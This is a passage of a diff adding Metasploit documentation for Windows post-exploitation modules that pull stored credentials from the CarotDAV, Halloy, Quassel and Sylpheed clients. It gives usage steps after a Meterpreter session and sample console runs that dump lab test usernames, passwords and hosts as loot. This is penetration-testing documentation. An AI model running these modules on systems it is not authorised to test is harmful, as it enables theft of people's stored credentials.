+[+] File saved to:  /home/kali/.msf4/loot/20240508083815_default_10.0.0.2_AdiIRCnetworks._439992.bak
+
+[*] undefined method `each' for nil:NilClass
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+```

documentation/modules/post/windows/gather/credentials/carotdav_ftp.md

@@ -0,0 +1,107 @@
+## Vulnerable Application
+
+This post-exploitation module extracts clear text credentials from the CarotDAV ftp Client.
+
+The CarotDAV FTP Client is avaialble from (https://rei.to/carotdav_en.html).
+
+This module extracts information from the Setting file in the "AppData\Roaming\Rei Software\CarotDAV" directory.
+
+This module extracts server information such as connection name, target URI, username and password.
+
+
+## Verification Steps
+
+1. Start MSF console
+2. Get a Meterpreter session on a Windows system
+3. use post/windows/gather/credentials/carotdav_ftp
+4. Set SESSION 1
+5. enter 'run' to extract credentials from all applications
+
+
+## Options
+### VERBOSE
+
+By default verbose is turned off. When turned on, the module will show information on files
+which aren't extracted and information that is not directly related to the artifact output.
+
+
+### STORE_LOOT
+This option is turned on by default and saves the stolen artifacts/files on the local machine,
+this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries.
+
+
+### EXTRACT_DATA
+This option is turned on by default and will perform the data extraction using the predefined
+regular expression. The 'Store loot' options must be turned on in order for this to take work.
+
+## Scenarios
+### CarotDAV FTP v1.16.3 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Default Output
+```
+msf6 post(windows/gather/credentials/carotdav_ftp) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Carotdav's Setting file found
+[*] Downloading C:\Users\test\AppData\Roaming\Rei Software\CarotDAV\Setting.xml
+[*] Carotdav Setting.xml downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508103946_default_10.0.0.2_CarotDAVSetting._341142.xml
+
+[+] <Name>TheTestBed</Name>
+[+] <Name>Aperture Testing Laboratories</Name>
+[+] <TargetUri>ftp://10.0.0.2/</TargetUri>
+[+] <TargetUri>ftp://10.0.0.3/</TargetUri>
+[+] <UserName>TestBed\TheTester</UserName>
+[+] <UserName>TestBed\TheBackupTester</UserName>
+[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password>
+[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password>
+[+] File with data saved:  /home/kali/.msf4/loot/20240508103947_default_10.0.0.2_EXTRACTIONSSetti_673514.xml
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```
+
+### CarotDAV FTP v1.16.3 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Verbose Output
+```
+msf6 post(windows/gather/credentials/carotdav_ftp) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Starting Packrat...
+[-] Carotdav's base folder not found in users's user directory
+
+[*] Starting Packrat...
+[*] Carotdav's base folder found
+[*] Found the folder containing specified artifact for Setting.
+[*] Carotdav's Setting file found
+[*] Processing C:\Users\test\AppData\Roaming\Rei Software\CarotDAV
+[*] Downloading C:\Users\test\AppData\Roaming\Rei Software\CarotDAV\Setting.xml
+[*] Carotdav Setting.xml downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508103903_default_10.0.0.2_CarotDAVSetting._292914.xml
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <Name>TheTestBed</Name>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <Name>Aperture Testing Laboratories</Name>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <TargetUri>ftp://10.0.0.2/</TargetUri>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <TargetUri>ftp://10.0.0.3/</TargetUri>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <UserName>TestBed\TheTester</UserName>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <UserName>TestBed\TheBackupTester</UserName>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password>
+[+] File with data saved:  /home/kali/.msf4/loot/20240508103903_default_10.0.0.2_EXTRACTIONSSetti_754664.xml
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```

documentation/modules/post/windows/gather/credentials/halloy_irc.md

@@ -0,0 +1,93 @@
+## Vulnerable Application
+
+This post-exploitation module extracts clear text credentials from the Halloy IRC Client.
+
+The Halloy IRC Client is avaialble from (https://github.com/squidowl/halloy).
+
+This module extracts information from the config.toml file in the "AppData\Roaming\Halloy" directory.
+
+This module extracts server information such as server, port, nickname, password and proxy password.
+
+
+## Verification Steps
+
+1. Start MSF console
+2. Get a Meterpreter session on a Windows system
+3. use post/windows/gather/credentials/halloy_irc
+4. Set SESSION 1
+5. enter 'run' to extract credentials from all applications
+
+
+## Options
+### VERBOSE
+
+By default verbose is turned off. When turned on, the module will show information on files
+which aren't extracted and information that is not directly related to the artifact output.
+
+
+### STORE_LOOT
+This option is turned on by default and saves the stolen artifacts/files on the local machine,
+this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries.
+
+
+### EXTRACT_DATA
+This option is turned on by default and will perform the data extraction using the predefined
+regular expression. The 'Store loot' options must be turned on in order for this to take work.
+
+## Scenarios
+### Halloy v2024.6 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Default Output
+```
+msf6 post(windows/gather/credentials/halloy_irc) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Halloy irc's Config.toml file found
+[*] Downloading C:\Users\test\AppData\Roaming\halloy\config.toml
+[*] Halloy irc Config.toml downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240507133313_default_10.0.0.2_HalloyIRCconfig_968975.toml
+
+[+] server="irc.libera.chat"
+[+] port=6697
+[+] nickname="halloy4169"
+[+] File with data saved:  /home/kali/.msf4/loot/20240507133313_default_10.0.0.2_EXTRACTIONconfig_815098.toml
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```
+
+### Halloy v2024.6 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Verbose Output
+```
+
+msf6 post(windows/gather/credentials/halloy_irc_v2) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Starting Packrat...
+[-] Halloy irc's base folder not found in users's user directory
+
+[*] Starting Packrat...
+[*] Halloy irc's base folder found
+[*] Found the folder containing specified artifact for config.toml.
+[*] Halloy irc's Config.toml file found
+[*] Processing C:\Users\test\AppData\Roaming\halloy
+[*] Downloading C:\Users\test\AppData\Roaming\halloy\config.toml
+[*] Halloy irc Config.toml downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240507145656_default_10.0.0.2_HalloyIRCconfig_292638.toml
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] server="irc.libera.chat"
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] port=6697
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] nickname="halloy4169"
+[+] File with data saved:  /home/kali/.msf4/loot/20240507145656_default_10.0.0.2_EXTRACTIONconfig_238220.toml
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```

documentation/modules/post/windows/gather/credentials/quassel_irc.md

@@ -0,0 +1,131 @@
+## Vulnerable Application
+
+This post-exploitation module extracts clear text credentials from the Quassel IRC Client.
+
+The Quassel IRC Client is avaialble from (https://quassel-irc.org/downloads).
+
+This module extracts information from the quasselclient.ini file in the "AppData\Roaming\quassel-irc.org" directory.
+
+This module extracts server information such as host name, port, account name, password and proxy password.
+
+
+## Verification Steps
+
+1. Start MSF console
+2. Get a Meterpreter session on a Windows system
+3. use post/windows/gather/credentials/quasell_irc
+4. Set SESSION 1
+5. enter 'run' to extract credentials from all applications
+
+
+## Options
+### VERBOSE
+
+By default verbose is turned off. When turned on, the module will show information on files
+which aren't extracted and information that is not directly related to the artifact output.
+
+
+### STORE_LOOT
+This option is turned on by default and saves the stolen artifacts/files on the local machine,
+this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries.
+
+
+### EXTRACT_DATA
+This option is turned on by default and will perform the data extraction using the predefined
+regular expression. The 'Store loot' options must be turned on in order for this to take work.
+
+## Scenarios
+### Quassel Client v0.14.0 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Default Output
+```
+msf6 post(windows/gather/credentials/quassel_irc) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Quassel irc's Quasselclient.ini file found
+[*] Downloading C:\Users\test\AppData\Roaming\quassel-irc.org\quasselclient.ini
+[*] Quassel irc Quasselclient.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240507163717_default_10.0.0.2_QuasselIRCquass_570372.ini
+
+[+] 1\HostName=10.245.100.2
+[+] 2\HostName=10.0.0.3
+[+] 1\Port=4242
+[+] 2\Port=1234
+[+] 1\AccountName=Test
+[+] 2\AccountName=Test#2
+[+] 1\Password=tiaspbiqe2r
+[+] 2\Password=tiaspbiqe2r
+[+] 1\ProxyHostName=localhost
+[+] 2\ProxyHostName=
+[+] 1\ProxyPort=8080
+[+] 2\ProxyPort=8080
+[+] 1\ProxyUser=test
+[+] 2\ProxyUser=
+[+] 1\ProxyPassword=tiaspbiqe2r
+[+] 2\ProxyPassword=
+[+] File with data saved:  /home/kali/.msf4/loot/20240507163717_default_10.0.0.2_EXTRACTIONquasse_134569.ini
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```
+
+### Quassel Client v0.14.0 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Verbose Output
+```
+msf6 post(windows/gather/credentials/quassel_irc) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Starting Packrat...
+[-] Quassel irc's base folder not found in user's user directory
+
+[*] Starting Packrat...
+[*] Quassel irc's base folder found
+[*] Found the folder containing specified artifact for quasselclient.ini.
+[*] Quassel irc's Quasselclient.ini file found
+[*] Processing C:\Users\test\AppData\Roaming\quassel-irc.org
+[*] Downloading C:\Users\test\AppData\Roaming\quassel-irc.org\quasselclient.ini
+[*] Quassel irc Quasselclient.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240507164141_default_10.0.0.2_QuasselIRCquass_310535.ini
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\HostName=10.245.100.2
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\HostName=10.0.0.3
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\Port=4242
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\Port=1234
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\AccountName=Test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\AccountName=Test#2
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\Password=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\Password=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\ProxyHostName=localhost
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\ProxyHostName=
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\ProxyPort=8080
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\ProxyPort=8080
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\ProxyUser=test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\ProxyUser=
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\ProxyPassword=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\ProxyPassword=
+[+] File with data saved:  /home/kali/.msf4/loot/20240507164141_default_10.0.0.2_EXTRACTIONquasse_967148.ini
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```

documentation/modules/post/windows/gather/credentials/sylpheed.md

@@ -0,0 +1,408 @@
+## Vulnerable Application
+
+This post-exploitation module extracts clear text credentials from the Sylpheed Email Client.
+
+The Sylpheed Email Client is avaialble from (https://sylpheed.sraoss.jp/en/).
+
+This module extracts information from the accountrc file in the "AppData\Roaming\Sylpheed" directory.
+
+This module extracts server information such as account name, username, email address and password.
+
+
+## Verification Steps
+
+1. Start MSF console
+2. Get a Meterpreter session on a Windows system
+3. use post/windows/gather/credentials/sylpheed
+4. Set SESSION 1
+5. enter 'run' to extract credentials from all applications
+
+
+## Options
+### VERBOSE
+
+By default verbose is turned off. When turned on, the module will show information on files
+which aren't extracted and information that is not directly related to the artifact output.
+
+
+### STORE_LOOT
+This option is turned on by default and saves the stolen artifacts/files on the local machine,
+this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries.
+
+
+### EXTRACT_DATA
+This option is turned on by default and will perform the data extraction using the predefined
+regular expression. The 'Store loot' options must be turned on in order for this to take work.
+
+## Scenarios
+### Sylpheed v3.17.0 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Default Output
+```
+msf6 post(windows/gather/credentials/sylpheed) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Sylpheed's Accountrc file found
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc
+[*] Sylpheed Accountrc downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508100023_default_10.0.0.2_Sylpheedaccountr_511987.bin
+
+[+] account_name=tmctestface50@gmail.com
+[+] account_name=TheTestBed@testers.com
+[+] account_name=tmctestface50@gmail.com
+[+] name=tmctestface50@gmail.com
+[+] name=TestMcTestFace
+[+] name=TheTestBed@testers.com
+[+] name=Test
+[+] name=Wojtek
+[+] name=tmctestface50@gmail.com
+[+] name=Testy
+[+] address=tmctestface50@gmail.com
+[+] address=TheTestBed@testers.com
+[+] address=tmctestface50@gmail.com
+[+] password=tiaspbiqe2r
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508100023_default_10.0.0.2_EXTRACTIONaccoun_507929.bin
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.1
+[*] Sylpheed Accountrc.bak.1 downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508100023_default_10.0.0.2_Sylpheedaccountr_329585.1
+
+[+] account_name=tmctestface50@gmail.com
+[+] account_name=TheTestBed@testers.com
+[+] account_name=tmctestface50@gmail.com
+[+] name=tmctestface50@gmail.com
+[+] name=TestMcTestFace
+[+] name=TheTestBed@testers.com
+[+] name=Test
+[+] name=Wojtek
+[+] name=tmctestface50@gmail.com
+[+] name=Testy
+[+] address=tmctestface50@gmail.com
+[+] address=TheTestBed@testers.com
+[+] address=tmctestface50@gmail.com
+[+] password=tiaspbiqe2r
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_EXTRACTIONaccoun_146899.1
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak
+[*] Sylpheed Accountrc.bak downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_Sylpheedaccountr_450482.bak
+
+[+] account_name=tmctestface50@gmail.com
+[+] account_name=TheTestBed@testers.com
+[+] account_name=tmctestface50@gmail.com
+[+] name=tmctestface50@gmail.com
+[+] name=TestMcTestFace
+[+] name=TheTestBed@testers.com
+[+] name=Test
+[+] name=Wojtek
+[+] name=tmctestface50@gmail.com
+[+] name=Testy
+[+] address=tmctestface50@gmail.com
+[+] address=TheTestBed@testers.com
+[+] address=tmctestface50@gmail.com
+[+] password=tiaspbiqe2r
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_EXTRACTIONaccoun_424899.bak
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.2
+[*] Sylpheed Accountrc.bak.2 downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_Sylpheedaccountr_852103.2
+
+[+] account_name=tmctestface50@gmail.com
+[+] account_name=TheTestBed@testers.com
+[+] account_name=tmctestface50@gmail.com
+[+] name=tmctestface50@gmail.com
+[+] name=TestMcTestFace
+[+] name=TheTestBed@testers.com
+[+] name=Test
+[+] name=Wojtek
+[+] name=tmctestface50@gmail.com
+[+] name=Testy
+[+] address=tmctestface50@gmail.com
+[+] address=TheTestBed@testers.com
+[+] address=tmctestface50@gmail.com
+[+] password=tiaspbiqe2r
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_EXTRACTIONaccoun_342490.2
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.3
+[*] Sylpheed Accountrc.bak.3 downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_Sylpheedaccountr_575350.3
+
+[+] account_name=tmctestface50@gmail.com
+[+] account_name=TheTestBed@testers.com
+[+] account_name=tmctestface50@gmail.com
+[+] name=tmctestface50@gmail.com
+[+] name=TestMcTestFace
+[+] name=TheTestBed@testers.com
+[+] name=Test
+[+] name=Wojtek
+[+] name=tmctestface50@gmail.com
+[+] name=Testy
+[+] address=tmctestface50@gmail.com
+[+] address=TheTestBed@testers.com
+[+] address=tmctestface50@gmail.com
+[+] password=tiaspbiqe2r
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508100025_default_10.0.0.2_EXTRACTIONaccoun_038250.3
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.4
+[*] Sylpheed Accountrc.bak.4 downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508100025_default_10.0.0.2_Sylpheedaccountr_780534.4
+
+[+] account_name=tmctestface50@gmail.com
+[+] account_name=TheTestBed@testers.com
+[+] account_name=tmctestface50@gmail.com
+[+] name=tmctestface50@gmail.com
+[+] name=TestMcTestFace
+[+] name=TheTestBed@testers.com
+[+] name=Test
+[+] name=Wojtek
+[+] name=tmctestface50@gmail.com
+[+] name=Testy
+[+] address=tmctestface50@gmail.com
+[+] address=TheTestBed@testers.com
+[+] address=tmctestface50@gmail.com
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508100025_default_10.0.0.2_EXTRACTIONaccoun_554415.4
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```
+
+### Sylpheed v3.17.0 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Verbose Output
+```
+
+msf6 post(windows/gather/credentials/sylpheed) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Starting Packrat...
+[-] Sylpheed's base folder not found in user's user directory
+
+[*] Starting Packrat...
+[*] Sylpheed's base folder found
+[*] Found the folder containing specified artifact for accountrc.
+[*] Sylpheed's Accountrc file found
+[*] Processing C:\Users\test\AppData\Roaming\Sylpheed
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc
+[*] Sylpheed Accountrc downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508095409_default_10.0.0.2_Sylpheedaccountr_913568.bin
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TestMcTestFace
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Wojtek
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Testy
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508095409_default_10.0.0.2_EXTRACTIONaccoun_539546.bin
+[*] Processing C:\Users\test\AppData\Roaming\Sylpheed
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.1
+[*] Sylpheed Accountrc.bak.1 downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508095409_default_10.0.0.2_Sylpheedaccountr_194058.1
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TestMcTestFace
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Wojtek
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Testy
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508095410_default_10.0.0.2_EXTRACTIONaccoun_583721.1
+[*] Processing C:\Users\test\AppData\Roaming\Sylpheed
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak
+[*] Sylpheed Accountrc.bak downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508095410_default_10.0.0.2_Sylpheedaccountr_972346.bak
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TestMcTestFace
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Wojtek
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Testy
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=TheTestBed@testers.com
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508095410_default_10.0.0.2_EXTRACTIONaccoun_967284.bak
+[*] Processing C:\Users\test\AppData\Roaming\Sylpheed
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.2
+[*] Sylpheed Accountrc.bak.2 downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508095410_default_10.0.0.2_Sylpheedaccountr_879167.2
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TestMcTestFace
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Wojtek
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Testy
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508095411_default_10.0.0.2_EXTRACTIONaccoun_021730.2
+[*] Processing C:\Users\test\AppData\Roaming\Sylpheed
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.3
+[*] Sylpheed Accountrc.bak.3 downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508095411_default_10.0.0.2_Sylpheedaccountr_102901.3
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TestMcTestFace
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Wojtek
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Testy
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508095411_default_10.0.0.2_EXTRACTIONaccoun_544427.3
+[*] Processing C:\Users\test\AppData\Roaming\Sylpheed
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.4
+[*] Sylpheed Accountrc.bak.4 downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508095411_default_10.0.0.2_Sylpheedaccountr_309871.4
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TestMcTestFace
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Wojtek
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Testy
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
